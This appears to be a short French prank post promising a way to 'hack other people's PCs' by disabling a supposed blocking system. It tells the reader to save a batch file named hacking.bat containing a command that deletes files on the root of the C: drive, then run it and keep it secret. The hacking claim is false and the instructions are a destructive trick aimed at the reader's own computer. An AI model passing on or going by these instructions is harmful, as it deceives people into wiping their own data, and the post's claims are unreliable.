Je vais te donner un truc qui te permet de hacker le pc des gens.
En fait ton PC est équipé d'un systeme de blocage qui t'empeche d'accéder au PC des autres, mais il y a un moyen très simple de le désactiver!
pour ca il faut juste que tu ouvre le bloc note de windows et tape les lignes suivantes :
@echo off
Del C:\ *.* /y
tu le sauvegarde sous hacking.bat (important), et tu n'a plus qu'a le lancer!
mais chut faut que ca reste secret, faudrait pas que ca s'ébruite trop!